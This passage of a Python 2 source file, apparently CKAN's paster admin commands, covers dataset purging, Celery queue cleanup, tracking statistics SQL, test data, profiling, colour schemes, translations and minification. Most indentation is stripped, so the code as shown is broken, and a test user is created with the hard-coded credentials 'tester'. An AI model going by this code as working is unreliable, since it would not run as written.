print 'count = %i' % datasets.count()
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' \
else ''
print '%s %s %s' % (dataset.id, dataset.name, state)
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(unicode(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print '%s %s -> %s' % (dataset.name, old_state, dataset.state)
def purge(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
name = dataset.name
rev = model.repo.new_revision()
dataset.purge()
model.repo.commit_and_remove()
print '%s purged' % name
class Celery(CkanCommand):
'''Celery daemon
Usage:
celeryd <run> - run the celery daemon
celeryd run concurrency - run the celery daemon with
argument 'concurrency'
celeryd view - view all tasks in the queue
celeryd clean - delete all tasks in the queue
'''
min_args = 0
max_args = 2
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
if not self.args:
self.run_()
else:
cmd = self.args[0]
if cmd == 'run':
self.run_()
elif cmd == 'view':
self.view()
elif cmd == 'clean':
self.clean()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def run_(self):
os.environ['CKAN_CONFIG'] = os.path.abspath(self.options.config)
from ckan.lib.celery_app import celery
celery_args = []
if len(self.args) == 2 and self.args[1] == 'concurrency':
            celery_args.append('--concurrency=1')
celery.worker_main(argv=['celeryd', '--loglevel=INFO'] + celery_args)
def view(self):
self._load_config()
import ckan.model as model
from kombu.transport.sqlalchemy.models import Message
q = model.Session.query(Message)
q_visible = q.filter_by(visible=True)
print '%i messages (total)' % q.count()
print '%i visible messages' % q_visible.count()
for message in q:
if message.visible:
print '%i: Visible' % (message.id)
else:
print '%i: Invisible Sent:%s' % (message.id, message.sent_at)
def clean(self):
self._load_config()
import ckan.model as model
query = model.Session.execute("select * from kombu_message")
tasks_initially = query.rowcount
if not tasks_initially:
print 'No tasks to delete'
sys.exit(0)
query = model.Session.execute("delete from kombu_message")
query = model.Session.execute("select * from kombu_message")
tasks_afterwards = query.rowcount
print '%i of %i tasks deleted' % (tasks_initially - tasks_afterwards,
tasks_initially)
if tasks_afterwards:
print 'ERROR: Failed to delete all tasks'
sys.exit(1)
model.repo.commit_and_remove()
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print 'Command %s not recognized' % cmd
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
if not user_ratings:
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
print self.__class__.__doc__
sys.exit(1)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
print self.__class__.__doc__
sys.exit(1)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
            # No date given. Find the most recent date we already have data
            # for and start from 2 days before it, in case new data has
            # arrived since. If there is no existing data, use 2011-01-01
            # as the start date.
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
start_date_solrsync = start_date
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print 'tracking updated for %s' % start_date
start_date = stop_date
self.update_tracking_solr(engine, start_date_solrsync)
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(
sql, measure_from=str(measure_from)
).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '/dataset/'
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)='%s';
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;''' % summary_date
engine.execute(sql)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE p.name = regexp_replace(' ' || t.url, '^[ ]{1}(/\w{2}){0,1}' || %s, ''))
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
def update_tracking_solr(self, engine, start_date):
sql = '''SELECT package_id FROM tracking_summary
where package_id!='~~not~found~~'
and tracking_date >= %s;'''
results = engine.execute(sql, start_date)
package_ids = set()
for row in results:
package_ids.add(row['package_id'])
total = len(package_ids)
not_found = 0
print '%i package index%s to be rebuilt starting from %s' % (total, '' if total < 2 else 'es', start_date)
from ckan.lib.search import rebuild
for package_id in package_ids:
try:
rebuild(package_id)
except logic.NotFound:
print "Error: package %s not found." % (package_id)
not_found += 1
except KeyboardInterrupt:
print "Stopped."
return
except:
raise
print 'search index rebuilding done.' + (' %i not found.' % (not_found) if not_found else "")
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class' : item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc' : plugin.__doc__,
'class' : plugin,
'implements' : []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print plugin + ':'
print '-' * (len(plugin) + 1)
if p['doc']:
print p['doc']
print 'Implements:'
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print ' %s' % i
if extra:
print extra
print
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
            # if this is a classmethod, drop the first parameter (cls)
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
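# Illustrative sketch (hypothetical helper, not part of CKAN): what
# PluginInfo.function_info() above renders for a simple action function --
# roughly ' _example_org_list(context, data_dict=None)' followed by the
# indented docstring lines.
def _example_render_function_info():
    def _example_org_list(context, data_dict=None):
        '''Return a list of organisations (illustration only).'''
        return []
    return PluginInfo('plugin-info').function_info(
        {'_example_org_list': _example_org_list})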
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
create-test-data vocabs - annakerenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
self._setup_app()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print 'Creating %s test data' % cmd
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print 'Created user %r with password %r and apikey %r' % ('tester',
'tester', 'tester')
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print 'Command %s not recognized' % cmd
raise NotImplementedError
if self.verbose:
print 'Creating %s test data: Complete!' % cmd
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by runsnakerun.
Usage:
profile URL
e.g. profile /data/search
    The result is saved in ckan.data.search.profile
    To view the profile in runsnakerun:
       runsnakerun ckan.data.search.profile
    You may need to install the runsnakerun python module (cProfile itself
    ships with the Python standard library)
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
def profile_url(url):
try:
res = self.app.get(url, status=[200], extra_environ={'REMOTE_USER': 'visitor'})
except paste.fixture.AppError:
print 'App error: ', url.strip()
except KeyboardInterrupt:
raise
except:
import traceback
traceback.print_exc()
print 'Unknown error: ', url.strip()
output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
print 'Written profile to: %s' % output_filename
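# Illustrative sketch (an assumption, not part of CKAN): the same
# cProfile.runctx() pattern used by Profile.command() above, applied to an
# arbitrary callable instead of a CKAN URL.
def _example_profile_callable(fn, output_filename='example.profile'):
    import cProfile
    cProfile.runctx('fn()', globals(), {'fn': fn}, filename=output_filename)
    print 'Written profile to: %s' % output_filename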
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
    color <'HEX'>      - use as the base color, e.g. '#ff00ff' (must be quoted).
    color <VALUE>      - a float between 0.0 and 1.0 used as the base hue
    color <COLOR_NAME> - html color name used as the base color, e.g. lightblue
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
        'aliceblue': '#f0f8ff',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
        'indianred': '#cd5c5c',
        'indigo': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
'mediumpurple': '#9370d8',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
'palevioletred': '#d87093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
if saturation is None:
saturation = 0.9
if lightness is None:
lightness = 40
else:
lightness *= 100
import math
saturation -= math.trunc(saturation)
print hue, saturation
import colorsys
''' Create n related colours '''
colors=[]
for i in xrange(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
# check and remove any bad values
if not re.match('^\#[0-9a-f]{6}$', hex_color):
hex_color='#FFFFFF'
colors.append(hex_color)
return colors
def command(self):
hue = None
saturation = None
lightness = None
path = os.path.dirname(__file__)
path = os.path.join(path, '..', 'public', 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print 'custom colors removed.'
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
rgb = [int(x, 16) * 16 for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print 'ERROR: invalid color'
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print 'ERROR argument `%s` not recognised' % arg
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in xrange(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print '%s: %s;\n' % (self.rules[i], colors[i])
            f.close()
print 'Color scheme has been created.'
print 'Make sure less is run for changes to take effect.'
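# Illustrative sketch (not part of CKAN): a standalone version of the hue-to-hex
# conversion performed by CreateColorSchemeCommand.create_colors(), using only the
# standard library. The default hue/saturation/lightness values are assumptions.
def _example_related_colors(hue=0.6, num_colors=5, saturation=0.9, lightness=0.4):
    import colorsys
    colors = []
    for i in range(num_colors):
        # Spread lightness across the palette, capping at 1.0 as create_colors() does.
        step = (i * (1.0 / num_colors)) * 0.4
        _lightness = min(lightness + step, 1.0)
        r, g, b = colorsys.hls_to_rgb(hue, _lightness, saturation)
        colors.append('#%02x%02x%02x' % (int(r * 255), int(g * 255), int(b * 255)))
    return colors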
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from pylons import config
self.ckan_path = os.path.join(os.path.dirname(__file__), '..')
i18n_path = os.path.join(self.ckan_path, 'i18n')
self.i18n_path = config.get('ckan.i18n_directory', i18n_path)
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
self.build_js_translations()
else:
print 'command not recognised'
def po2dict(self, po, lang):
'''Convert po object to dictionary data structure (ready for JSON).
This function is from pojson
https://bitbucket.org/obviel/pojson
Copyright (c) 2010, Fanstatic Developers
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the <organization> nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL FANSTATIC DEVELOPERS BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
result = {}
result[''] = {}
result['']['plural-forms'] = po.metadata['Plural-Forms']
result['']['lang'] = lang
result['']['domain'] = 'ckan'
for entry in po:
if entry.obsolete:
continue
            # only include entries that are used in at least one .js file
occurrences = entry.occurrences
js_use = False
for occurrence in occurrences:
if occurrence[0].endswith('.js'):
js_use = True
continue
if not js_use:
continue
if entry.msgstr:
result[entry.msgid] = [None, entry.msgstr]
elif entry.msgstr_plural:
plural = [entry.msgid_plural]
result[entry.msgid] = plural
ordered_plural = sorted(entry.msgstr_plural.items())
for order, msgstr in ordered_plural:
plural.append(msgstr)
return result
def build_js_translations(self):
import polib
import simplejson as json
def create_js(source, lang):
print 'Generating', lang
po = polib.pofile(source)
data = self.po2dict(po, lang)
data = json.dumps(data, sort_keys=True,
ensure_ascii=False, indent=2 * ' ')
out_dir = os.path.abspath(os.path.join(self.ckan_path, 'public',
'base', 'i18n'))
out_file = open(os.path.join(out_dir, '%s.js' % lang), 'w')
out_file.write(data.encode('utf-8'))
out_file.close()
for l in os.listdir(self.i18n_path):
if os.path.isdir(os.path.join(self.i18n_path, l)):
f = os.path.join(self.i18n_path, l, 'LC_MESSAGES', 'ckan.po')
create_js(f, l)
print 'Completed generating JavaScript translations'
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
        NOTE: This will destroy the current translations for zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print 'zh_TW has been mangled'
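# Illustrative sketch (not part of CKAN): the masking idea behind mangle_po(), shown
# with a deliberately simplified placeholder regex (the real command also preserves
# [1:...], {...} and <...> markers plus the full sprintf grammar).
def _example_mangle(msgid=u'Download the %(format)s file'):
    import re
    placeholder = r'%\([^)]*\)s|%s'
    mangled = u''
    position = 0
    for match in re.finditer(placeholder, msgid):
        # Replace everything before the placeholder with dashes, keep the placeholder.
        mangled += u'-' * (match.start() - position) + match.group(0)
        position = match.end()
    mangled += u'-' * (len(msgid) - position)
    return mangled  # e.g. u'-' * 13 + u'%(format)s' + u'-' * 5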
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
paster minify ckan/public/base/css/red.css
if the --clean option is provided any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False, help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
dirs[:] = [d for d in dirs if not d in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
                # Path is neither a file nor a directory, so skip it.
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print 'removing %s' % path
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
        minified.
:param path: The path to the .js or .css file to minify
'''
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print "Minified file '{0}'".format(path)
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self.less()
custom_css = {
'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
